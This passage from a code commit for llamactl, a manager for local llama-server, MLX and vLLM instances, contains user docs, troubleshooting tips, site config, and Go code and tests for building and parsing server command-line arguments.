4. Instance status changes to "Ready" when ready
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Check instance status in real-time:
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying backend instances (llama-server, MLX, or vLLM).
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/proxy/
```
All backends provide OpenAI-compatible endpoints. Check the respective documentation:
- [llama-server docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md)
- [MLX-LM docs](https://github.com/ml-explore/mlx-lm/blob/main/mlx_lm/SERVER.md)
- [vLLM docs](https://docs.vllm.ai/en/latest/)
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
```

View File

@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

79
mkdocs.yml Normal file
View File

@@ -0,0 +1,79 @@
site_name: Llamatl Documentation
site_description: User documentation for Llamatl - A management tool for Llama.cpp instances
site_author: Llamatl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
- mike:
version_selector: true
css_dir: css
javascript_dir: js
canonical_version: null
hooks:
- docs/readme_sync.py
extra:
version:
provider: mike
default: stable
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

10
pkg/backends/backend.go Normal file
View File

@@ -0,0 +1,10 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
BackendTypeMlxLm BackendType = "mlx_lm"
BackendTypeVllm BackendType = "vllm"
// BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
)

93
pkg/backends/builder.go Normal file
View File

@@ -0,0 +1,93 @@
package backends
import (
"fmt"
"llamactl/pkg/config"
"reflect"
"strconv"
"strings"
)
// BuildCommandArgs converts a struct to command line arguments
func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
var args []string
v := reflect.ValueOf(options).Elem()
t := v.Type()
for i := 0; i < v.NumField(); i++ {
field := v.Field(i)
fieldType := t.Field(i)
if !field.CanInterface() {
continue
}
jsonTag := fieldType.Tag.Get("json")
if jsonTag == "" || jsonTag == "-" {
continue
}
// Get flag name from JSON tag
flagName := strings.Split(jsonTag, ",")[0]
flagName = strings.ReplaceAll(flagName, "_", "-")
switch field.Kind() {
case reflect.Bool:
if field.Bool() {
args = append(args, "--"+flagName)
}
case reflect.Int:
if field.Int() != 0 {
args = append(args, "--"+flagName, strconv.FormatInt(field.Int(), 10))
}
case reflect.Float64:
if field.Float() != 0 {
args = append(args, "--"+flagName, strconv.FormatFloat(field.Float(), 'f', -1, 64))
}
case reflect.String:
if field.String() != "" {
args = append(args, "--"+flagName, field.String())
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String && field.Len() > 0 {
if multipleFlags[flagName] {
// Multiple flags: --flag value1 --flag value2
for j := 0; j < field.Len(); j++ {
args = append(args, "--"+flagName, field.Index(j).String())
}
} else {
// Comma-separated: --flag value1,value2
var values []string
for j := 0; j < field.Len(); j++ {
values = append(values, field.Index(j).String())
}
args = append(args, "--"+flagName, strings.Join(values, ","))
}
}
}
}
return args
}
// BuildDockerCommand builds a Docker command with the specified configuration and arguments
func BuildDockerCommand(backendConfig *config.BackendSettings, instanceArgs []string) (string, []string, error) {
// Start with configured Docker arguments (should include "run", "--rm", etc.)
dockerArgs := make([]string, len(backendConfig.Docker.Args))
copy(dockerArgs, backendConfig.Docker.Args)
// Add environment variables
for key, value := range backendConfig.Docker.Environment {
dockerArgs = append(dockerArgs, "-e", fmt.Sprintf("%s=%s", key, value))
}
// Add image name
dockerArgs = append(dockerArgs, backendConfig.Docker.Image)
// Add backend args and instance args
dockerArgs = append(dockerArgs, backendConfig.Args...)
dockerArgs = append(dockerArgs, instanceArgs...)
return "docker", dockerArgs, nil
}

View File

@@ -2,11 +2,33 @@ package llamacpp
import (
"encoding/json"
"llamactl/pkg/backends"
"reflect"
"strconv"
"strings"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
// Used for both parsing (with underscores) and building (with dashes)
var multiValuedFlags = map[string]bool{
// Parsing keys (with underscores)
"override_tensor": true,
"override_kv": true,
"lora": true,
"lora_scaled": true,
"control_vector": true,
"control_vector_scaled": true,
"dry_sequence_breaker": true,
"logit_bias": true,
// Building keys (with dashes)
"override-tensor": true,
"override-kv": true,
"lora-scaled": true,
"control-vector": true,
"control-vector-scaled": true,
"dry-sequence-breaker": true,
"logit-bias": true,
}
type LlamaServerOptions struct {
// Common params
VerbosePrompt bool `json:"verbose_prompt,omitempty"`
@@ -315,62 +337,31 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// BuildCommandArgs converts InstanceOptions to command line arguments
func (o *LlamaServerOptions) BuildCommandArgs() []string {
var args []string
// Llama uses multiple flags for arrays by default (not comma-separated)
// Use package-level multiValuedFlags variable
return backends.BuildCommandArgs(o, multiValuedFlags)
}
v := reflect.ValueOf(o).Elem()
t := v.Type()
func (o *LlamaServerOptions) BuildDockerArgs() []string {
// For llama, Docker args are the same as normal args
return o.BuildCommandArgs()
}
for i := 0; i < v.NumField(); i++ {
field := v.Field(i)
fieldType := t.Field(i)
// ParseLlamaCommand parses a llama-server command string into LlamaServerOptions
// Supports multiple formats:
// 1. Full command: "llama-server --model file.gguf"
// 2. Full path: "/usr/local/bin/llama-server --model file.gguf"
// 3. Args only: "--model file.gguf --gpu-layers 32"
// 4. Multiline commands with backslashes
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
executableNames := []string{"llama-server"}
var subcommandNames []string // Llama has no subcommands
// Use package-level multiValuedFlags variable
// Skip unexported fields
if !field.CanInterface() {
continue
}
// Get the JSON tag to determine the flag name
jsonTag := fieldType.Tag.Get("json")
if jsonTag == "" || jsonTag == "-" {
continue
}
// Remove ",omitempty" from the tag
flagName := jsonTag
if commaIndex := strings.Index(jsonTag, ","); commaIndex != -1 {
flagName = jsonTag[:commaIndex]
}
// Convert snake_case to kebab-case for CLI flags
flagName = strings.ReplaceAll(flagName, "_", "-")
// Add the appropriate arguments based on field type and value
switch field.Kind() {
case reflect.Bool:
if field.Bool() {
args = append(args, "--"+flagName)
}
case reflect.Int:
if field.Int() != 0 {
args = append(args, "--"+flagName, strconv.FormatInt(field.Int(), 10))
}
case reflect.Float64:
if field.Float() != 0 {
args = append(args, "--"+flagName, strconv.FormatFloat(field.Float(), 'f', -1, 64))
}
case reflect.String:
if field.String() != "" {
args = append(args, "--"+flagName, field.String())
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String {
// Handle []string fields
for j := 0; j < field.Len(); j++ {
args = append(args, "--"+flagName, field.Index(j).String())
}
}
}
var llamaOptions LlamaServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
return nil, err
}
return args
return &llamaOptions, nil
}

View File

@@ -378,6 +378,121 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
}
}
func TestParseLlamaCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "llama-server --model /path/to/model.gguf --gpu-layers 32",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model.gguf --ctx-size 4096",
expectErr: false,
},
{
name: "mixed flag formats",
command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
expectErr: false,
},
{
name: "quoted strings",
command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `llama-server --model test.gguf --api-key "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "llama-server ---model test.gguf",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := llamacpp.ParseLlamaCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseLlamaCommandValues(t *testing.T) {
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.gguf" {
t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model)
}
if result.GPULayers != 32 {
t.Errorf("expected gpu_layers 32, got %d", result.GPULayers)
}
if result.Temperature != 0.7 {
t.Errorf("expected temperature 0.7, got %f", result.Temperature)
}
if !result.Verbose {
t.Errorf("expected verbose to be true")
}
if !result.NoMmap {
t.Errorf("expected no_mmap to be true")
}
}
func TestParseLlamaCommandArrays(t *testing.T) {
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
result, err := llamacpp.ParseLlamaCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(result.Lora) != 2 {
t.Errorf("expected 2 lora adapters, got %d", len(result.Lora))
}
expected := []string{"adapter1.bin", "adapter2.bin"}
for i, v := range expected {
if result.Lora[i] != v {
t.Errorf("expected lora[%d]=%s got %s", i, v, result.Lora[i])
}
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)

56
pkg/backends/mlx/mlx.go Normal file
View File

@@ -0,0 +1,56 @@
package mlx
import (
"llamactl/pkg/backends"
)
type MlxServerOptions struct {
// Basic connection options
Model string `json:"model,omitempty"`
Host string `json:"host,omitempty"`
Port int `json:"port,omitempty"`
// Model and adapter options
AdapterPath string `json:"adapter_path,omitempty"`
DraftModel string `json:"draft_model,omitempty"`
NumDraftTokens int `json:"num_draft_tokens,omitempty"`
TrustRemoteCode bool `json:"trust_remote_code,omitempty"`
// Logging and templates
LogLevel string `json:"log_level,omitempty"`
ChatTemplate string `json:"chat_template,omitempty"`
UseDefaultChatTemplate bool `json:"use_default_chat_template,omitempty"`
ChatTemplateArgs string `json:"chat_template_args,omitempty"` // JSON string
// Sampling defaults
Temp float64 `json:"temp,omitempty"`
TopP float64 `json:"top_p,omitempty"`
TopK int `json:"top_k,omitempty"`
MinP float64 `json:"min_p,omitempty"`
MaxTokens int `json:"max_tokens,omitempty"`
}
// BuildCommandArgs converts to command line arguments
func (o *MlxServerOptions) BuildCommandArgs() []string {
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
return backends.BuildCommandArgs(o, multipleFlags)
}
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
// Supports multiple formats:
// 1. Full command: "mlx_lm.server --model model/path"
// 2. Full path: "/usr/local/bin/mlx_lm.server --model model/path"
// 3. Args only: "--model model/path --host 0.0.0.0"
// 4. Multiline commands with backslashes
func ParseMlxCommand(command string) (*MlxServerOptions, error) {
executableNames := []string{"mlx_lm.server"}
var subcommandNames []string // MLX has no subcommands
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
var mlxOptions MlxServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
return nil, err
}
return &mlxOptions, nil
}

View File

@@ -0,0 +1,157 @@
package mlx_test
import (
"llamactl/pkg/backends/mlx"
"testing"
)
func TestParseMlxCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic command",
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
expectErr: false,
},
{
name: "args only",
command: "--model /path/to/model --port 8080",
expectErr: false,
},
{
name: "mixed flag formats",
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
expectErr: false,
},
{
name: "quoted strings",
command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
expectErr: true,
},
{
name: "malformed flag",
command: "mlx_lm.server ---model test.mlx",
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := mlx.ParseMlxCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseMlxCommandValues(t *testing.T) {
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
result, err := mlx.ParseMlxCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "/test/model.mlx" {
t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
}
if result.Port != 8080 {
t.Errorf("expected port 8080, got %d", result.Port)
}
if result.Temp != 0.7 {
t.Errorf("expected temp 0.7, got %f", result.Temp)
}
if !result.TrustRemoteCode {
t.Errorf("expected trust_remote_code to be true")
}
if result.LogLevel != "DEBUG" {
t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := &mlx.MlxServerOptions{
Model: "/test/model.mlx",
Host: "127.0.0.1",
Port: 8080,
Temp: 0.7,
TopP: 0.9,
TopK: 40,
MaxTokens: 2048,
TrustRemoteCode: true,
LogLevel: "DEBUG",
ChatTemplate: "custom template",
}
args := options.BuildCommandArgs()
// Check that all expected flags are present
expectedFlags := map[string]string{
"--model": "/test/model.mlx",
"--host": "127.0.0.1",
"--port": "8080",
"--log-level": "DEBUG",
"--chat-template": "custom template",
"--temp": "0.7",
"--top-p": "0.9",
"--top-k": "40",
"--max-tokens": "2048",
}
for i := 0; i < len(args); i++ {
if args[i] == "--trust-remote-code" {
continue // Boolean flag with no value
}
if args[i] == "--use-default-chat-template" {
continue // Boolean flag with no value
}
if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
if args[i+1] != expectedValue {
t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
}
}
}
// Check boolean flags
foundTrustRemoteCode := false
for _, arg := range args {
if arg == "--trust-remote-code" {
foundTrustRemoteCode = true
}
}
if !foundTrustRemoteCode {
t.Errorf("expected --trust-remote-code flag to be present")
}
}

213
pkg/backends/parser.go Normal file
View File

@@ -0,0 +1,213 @@
package backends
import (
"encoding/json"
"fmt"
"path/filepath"
"regexp"
"strconv"
"strings"
)
// ParseCommand parses a command string into a target struct
func ParseCommand(command string, executableNames []string, subcommandNames []string, multiValuedFlags map[string]bool, target any) error {
// Normalize multiline commands
command = normalizeCommand(command)
if command == "" {
return fmt.Errorf("command cannot be empty")
}
// Extract arguments and positional model
args, modelFromPositional, err := extractArgs(command, executableNames, subcommandNames)
if err != nil {
return err
}
// Parse flags into map
options, err := parseFlags(args, multiValuedFlags)
if err != nil {
return err
}
// If we found a positional model and no --model flag was provided, set the model
if modelFromPositional != "" {
if _, hasModelFlag := options["model"]; !hasModelFlag {
options["model"] = modelFromPositional
}
}
// Convert to target struct via JSON
jsonData, err := json.Marshal(options)
if err != nil {
return fmt.Errorf("failed to marshal options: %w", err)
}
if err := json.Unmarshal(jsonData, target); err != nil {
return fmt.Errorf("failed to unmarshal to target: %w", err)
}
return nil
}
// normalizeCommand handles multiline commands with backslashes
func normalizeCommand(command string) string {
re := regexp.MustCompile(`\\\s*\n\s*`)
normalized := re.ReplaceAllString(command, " ")
re = regexp.MustCompile(`\s+`)
return strings.TrimSpace(re.ReplaceAllString(normalized, " "))
}
// extractArgs extracts arguments from command, removing executable and subcommands
// Returns: args, modelFromPositional, error
func extractArgs(command string, executableNames []string, subcommandNames []string) ([]string, string, error) {
// Check for unterminated quotes
if strings.Count(command, `"`)%2 != 0 || strings.Count(command, `'`)%2 != 0 {
return nil, "", fmt.Errorf("unterminated quoted string")
}
tokens := strings.Fields(command)
if len(tokens) == 0 {
return nil, "", fmt.Errorf("no tokens found")
}
// Skip executable
start := 0
firstToken := tokens[0]
// Check for executable name (with or without path)
if strings.Contains(firstToken, string(filepath.Separator)) {
baseName := filepath.Base(firstToken)
for _, execName := range executableNames {
if strings.HasSuffix(strings.ToLower(baseName), strings.ToLower(execName)) {
start = 1
break
}
}
} else {
for _, execName := range executableNames {
if strings.EqualFold(firstToken, execName) {
start = 1
break
}
}
}
// Skip subcommand if present
if start < len(tokens) {
for _, subCmd := range subcommandNames {
if strings.EqualFold(tokens[start], subCmd) {
start++
break
}
}
}
// Handle case where command starts with subcommand (no executable)
if start == 0 {
for _, subCmd := range subcommandNames {
if strings.EqualFold(firstToken, subCmd) {
start = 1
break
}
}
}
args := tokens[start:]
// Extract first positional argument (model) if present and not a flag
var modelFromPositional string
if len(args) > 0 && !strings.HasPrefix(args[0], "-") {
modelFromPositional = args[0]
args = args[1:] // Remove the model from args to process remaining flags
}
return args, modelFromPositional, nil
}
// parseFlags parses command line flags into a map
func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any, error) {
options := make(map[string]any)
for i := 0; i < len(args); i++ {
arg := args[i]
if !strings.HasPrefix(arg, "-") {
continue
}
// Check for malformed flags (more than two leading dashes)
if strings.HasPrefix(arg, "---") {
return nil, fmt.Errorf("malformed flag: %s", arg)
}
// Get flag name and value
var flagName, value string
var hasValue bool
if strings.Contains(arg, "=") {
parts := strings.SplitN(arg, "=", 2)
flagName = strings.TrimLeft(parts[0], "-")
value = parts[1]
hasValue = true
} else {
flagName = strings.TrimLeft(arg, "-")
if i+1 < len(args) && !strings.HasPrefix(args[i+1], "-") {
value = args[i+1]
hasValue = true
i++ // Skip next arg since we consumed it
}
}
// Convert kebab-case to snake_case for JSON
flagName = strings.ReplaceAll(flagName, "-", "_")
if hasValue {
// Handle multi-valued flags
if multiValuedFlags[flagName] {
if existing, ok := options[flagName].([]string); ok {
options[flagName] = append(existing, value)
} else {
options[flagName] = []string{value}
}
} else {
options[flagName] = parseValue(value)
}
} else {
// Boolean flag
options[flagName] = true
}
}
return options, nil
}
// parseValue converts string to appropriate type
func parseValue(value string) any {
// Remove quotes
if len(value) >= 2 {
if (value[0] == '"' && value[len(value)-1] == '"') || (value[0] == '\'' && value[len(value)-1] == '\'') {
value = value[1 : len(value)-1]
}
}
// Try boolean
switch strings.ToLower(value) {
case "true":
return true
case "false":
return false
}
// Try integer
if intVal, err := strconv.Atoi(value); err == nil {
return intVal
}
// Try float
if floatVal, err := strconv.ParseFloat(value, 64); err == nil {
return floatVal
}
// Return as string
return value
}

200
pkg/backends/vllm/vllm.go Normal file
View File

@@ -0,0 +1,200 @@
package vllm
import (
"llamactl/pkg/backends"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
var multiValuedFlags = map[string]bool{
"api-key": true,
"allowed-origins": true,
"allowed-methods": true,
"allowed-headers": true,
"middleware": true,
}
type VllmServerOptions struct {
// Basic connection options (auto-assigned by llamactl)
Host string `json:"host,omitempty"`
Port int `json:"port,omitempty"`
// Model and engine configuration
Model string `json:"model,omitempty"`
Tokenizer string `json:"tokenizer,omitempty"`
SkipTokenizerInit bool `json:"skip_tokenizer_init,omitempty"`
Revision string `json:"revision,omitempty"`
CodeRevision string `json:"code_revision,omitempty"`
TokenizerRevision string `json:"tokenizer_revision,omitempty"`
TokenizerMode string `json:"tokenizer_mode,omitempty"`
TrustRemoteCode bool `json:"trust_remote_code,omitempty"`
DownloadDir string `json:"download_dir,omitempty"`
LoadFormat string `json:"load_format,omitempty"`
ConfigFormat string `json:"config_format,omitempty"`
Dtype string `json:"dtype,omitempty"`
KVCacheDtype string `json:"kv_cache_dtype,omitempty"`
QuantizationParamPath string `json:"quantization_param_path,omitempty"`
Seed int `json:"seed,omitempty"`
MaxModelLen int `json:"max_model_len,omitempty"`
GuidedDecodingBackend string `json:"guided_decoding_backend,omitempty"`
DistributedExecutorBackend string `json:"distributed_executor_backend,omitempty"`
WorkerUseRay bool `json:"worker_use_ray,omitempty"`
RayWorkersUseNSight bool `json:"ray_workers_use_nsight,omitempty"`
// Performance and serving configuration
BlockSize int `json:"block_size,omitempty"`
EnablePrefixCaching bool `json:"enable_prefix_caching,omitempty"`
DisableSlidingWindow bool `json:"disable_sliding_window,omitempty"`
UseV2BlockManager bool `json:"use_v2_block_manager,omitempty"`
NumLookaheadSlots int `json:"num_lookahead_slots,omitempty"`
SwapSpace int `json:"swap_space,omitempty"`
CPUOffloadGB int `json:"cpu_offload_gb,omitempty"`
GPUMemoryUtilization float64 `json:"gpu_memory_utilization,omitempty"`
NumGPUBlocksOverride int `json:"num_gpu_blocks_override,omitempty"`
MaxNumBatchedTokens int `json:"max_num_batched_tokens,omitempty"`
MaxNumSeqs int `json:"max_num_seqs,omitempty"`
MaxLogprobs int `json:"max_logprobs,omitempty"`
DisableLogStats bool `json:"disable_log_stats,omitempty"`
Quantization string `json:"quantization,omitempty"`
RopeScaling string `json:"rope_scaling,omitempty"`
RopeTheta float64 `json:"rope_theta,omitempty"`
EnforceEager bool `json:"enforce_eager,omitempty"`
MaxContextLenToCapture int `json:"max_context_len_to_capture,omitempty"`
MaxSeqLenToCapture int `json:"max_seq_len_to_capture,omitempty"`
DisableCustomAllReduce bool `json:"disable_custom_all_reduce,omitempty"`
TokenizerPoolSize int `json:"tokenizer_pool_size,omitempty"`
TokenizerPoolType string `json:"tokenizer_pool_type,omitempty"`
TokenizerPoolExtraConfig string `json:"tokenizer_pool_extra_config,omitempty"`
EnableLoraBias bool `json:"enable_lora_bias,omitempty"`
LoraExtraVocabSize int `json:"lora_extra_vocab_size,omitempty"`
LoraRank int `json:"lora_rank,omitempty"`
PromptLookbackDistance int `json:"prompt_lookback_distance,omitempty"`
PreemptionMode string `json:"preemption_mode,omitempty"`
// Distributed and parallel processing
TensorParallelSize int `json:"tensor_parallel_size,omitempty"`
PipelineParallelSize int `json:"pipeline_parallel_size,omitempty"`
MaxParallelLoadingWorkers int `json:"max_parallel_loading_workers,omitempty"`
DisableAsyncOutputProc bool `json:"disable_async_output_proc,omitempty"`
WorkerClass string `json:"worker_class,omitempty"`
EnabledLoraModules string `json:"enabled_lora_modules,omitempty"`
MaxLoraRank int `json:"max_lora_rank,omitempty"`
FullyShardedLoras bool `json:"fully_sharded_loras,omitempty"`
LoraModules string `json:"lora_modules,omitempty"`
PromptAdapters string `json:"prompt_adapters,omitempty"`
MaxPromptAdapterToken int `json:"max_prompt_adapter_token,omitempty"`
Device string `json:"device,omitempty"`
SchedulerDelay float64 `json:"scheduler_delay,omitempty"`
EnableChunkedPrefill bool `json:"enable_chunked_prefill,omitempty"`
SpeculativeModel string `json:"speculative_model,omitempty"`
SpeculativeModelQuantization string `json:"speculative_model_quantization,omitempty"`
SpeculativeRevision string `json:"speculative_revision,omitempty"`
SpeculativeMaxModelLen int `json:"speculative_max_model_len,omitempty"`
SpeculativeDisableByBatchSize int `json:"speculative_disable_by_batch_size,omitempty"`
NgptSpeculativeLength int `json:"ngpt_speculative_length,omitempty"`
SpeculativeDisableMqa bool `json:"speculative_disable_mqa,omitempty"`
ModelLoaderExtraConfig string `json:"model_loader_extra_config,omitempty"`
IgnorePatterns string `json:"ignore_patterns,omitempty"`
PreloadedLoraModules string `json:"preloaded_lora_modules,omitempty"`
// OpenAI server specific options
UDS string `json:"uds,omitempty"`
UvicornLogLevel string `json:"uvicorn_log_level,omitempty"`
ResponseRole string `json:"response_role,omitempty"`
SSLKeyfile string `json:"ssl_keyfile,omitempty"`
SSLCertfile string `json:"ssl_certfile,omitempty"`
SSLCACerts string `json:"ssl_ca_certs,omitempty"`
SSLCertReqs int `json:"ssl_cert_reqs,omitempty"`
RootPath string `json:"root_path,omitempty"`
Middleware []string `json:"middleware,omitempty"`
ReturnTokensAsTokenIDS bool `json:"return_tokens_as_token_ids,omitempty"`
DisableFrontendMultiprocessing bool `json:"disable_frontend_multiprocessing,omitempty"`
EnableAutoToolChoice bool `json:"enable_auto_tool_choice,omitempty"`
ToolCallParser string `json:"tool_call_parser,omitempty"`
ToolServer string `json:"tool_server,omitempty"`
ChatTemplate string `json:"chat_template,omitempty"`
ChatTemplateContentFormat string `json:"chat_template_content_format,omitempty"`
AllowCredentials bool `json:"allow_credentials,omitempty"`
AllowedOrigins []string `json:"allowed_origins,omitempty"`
AllowedMethods []string `json:"allowed_methods,omitempty"`
AllowedHeaders []string `json:"allowed_headers,omitempty"`
APIKey []string `json:"api_key,omitempty"`
EnableLogOutputs bool `json:"enable_log_outputs,omitempty"`
EnableTokenUsage bool `json:"enable_token_usage,omitempty"`
EnableAsyncEngineDebug bool `json:"enable_async_engine_debug,omitempty"`
EngineUseRay bool `json:"engine_use_ray,omitempty"`
DisableLogRequests bool `json:"disable_log_requests,omitempty"`
MaxLogLen int `json:"max_log_len,omitempty"`
// Additional engine configuration
Task string `json:"task,omitempty"`
MultiModalConfig string `json:"multi_modal_config,omitempty"`
LimitMmPerPrompt string `json:"limit_mm_per_prompt,omitempty"`
EnableSleepMode bool `json:"enable_sleep_mode,omitempty"`
EnableChunkingRequest bool `json:"enable_chunking_request,omitempty"`
CompilationConfig string `json:"compilation_config,omitempty"`
